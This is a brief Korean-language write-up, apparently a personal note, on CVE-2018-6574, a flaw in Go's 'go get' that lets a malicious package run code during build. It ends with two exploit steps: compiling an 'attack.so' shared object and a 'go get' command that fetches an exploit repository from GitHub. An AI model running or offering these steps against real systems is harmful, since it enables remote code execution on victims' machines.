
CVE-2018-6574 이 취약점은 Golang의 go get 명령에 영향을 미치며, 공격자가 악성 라이브러리를 설치하여 시스템에서 코드 실행을 할 수 있게 합니다. 이 취약점은 Go 1.8. 7, 1.9. 4 및 1.10rc2에서 수정되었습니다. Golang은 네이티브 확장을 빌드합니다.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit